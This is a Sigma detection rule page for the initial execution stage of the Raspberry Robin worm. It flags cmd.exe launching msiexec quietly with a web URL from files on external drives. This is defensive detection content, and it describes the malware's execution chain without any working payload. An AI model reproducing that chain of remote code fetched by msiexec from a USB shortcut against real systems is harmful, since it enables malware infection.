Raspberry Robin initial execution from external drive
Detects execution from the external drive using cmd
Sigma rule (View on GitHub)
1title: Raspberry Robin initial execution from external drive
2description: Detects execution from the external drive using cmd
3status: experimental
4date: 2022/05/6
5author: \@kostastsale
6references:
7 - https://redcanary.com/blog/raspberry-robin/
8logsource:
9 category: process_creation
10 product: windows
11detection:
12 selection1:
13 ParentImage|endswith:
14 - '*\cmd.exe'
15 ParentCommandLine|contains:
16 - '/r'
17 Image|endswith:
18 - '*\msiexec.exe'
19 CommandLine|contains:
20 - '/q'
21 - '-q'
22 selection2:
23 CommandLine|contains:
24 - 'http:'
25 - 'https:'
26 ParentCommandLine|endswith:
27 - '.usb'
28 - '.ico'
29 - '.lnk'
30 - '.bin'
31 - '.sv'
32 - '.lo'
33 condition: selection1 and selection2
34falsepositives:
35 - Unlikely
36level: high
37tags:
38 - attack.execution
39 - attack.T1059.001
References
Related rules
- Raspberry Robin subsequent execution of commands
- ChromeLoader Malware Detection
- Emotet loader execution via .lnk file